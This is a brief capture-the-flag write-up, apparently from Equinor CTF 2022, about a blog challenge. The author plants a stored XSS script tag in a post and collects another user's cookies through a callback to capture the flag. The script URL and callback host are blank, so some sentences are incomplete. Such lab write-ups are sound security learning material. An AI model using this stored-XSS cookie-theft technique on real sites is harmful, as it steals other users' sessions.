View on GitHub

Equinor CTF 2022

Writeups for Equinor CTF 2022

The website is a simple blog. We register a user; test:test and login.

Then we create a blog post with an XSS-payload. This task has no input filtering so a simple payload is enough. I’ll use

<script src=></script>

Here we see our post with the hidden <script>-tag.

Now we wait for another user to trigger our payload. After waiting for a bit we get a callback on

The flag can be found in the “Cookies”-section: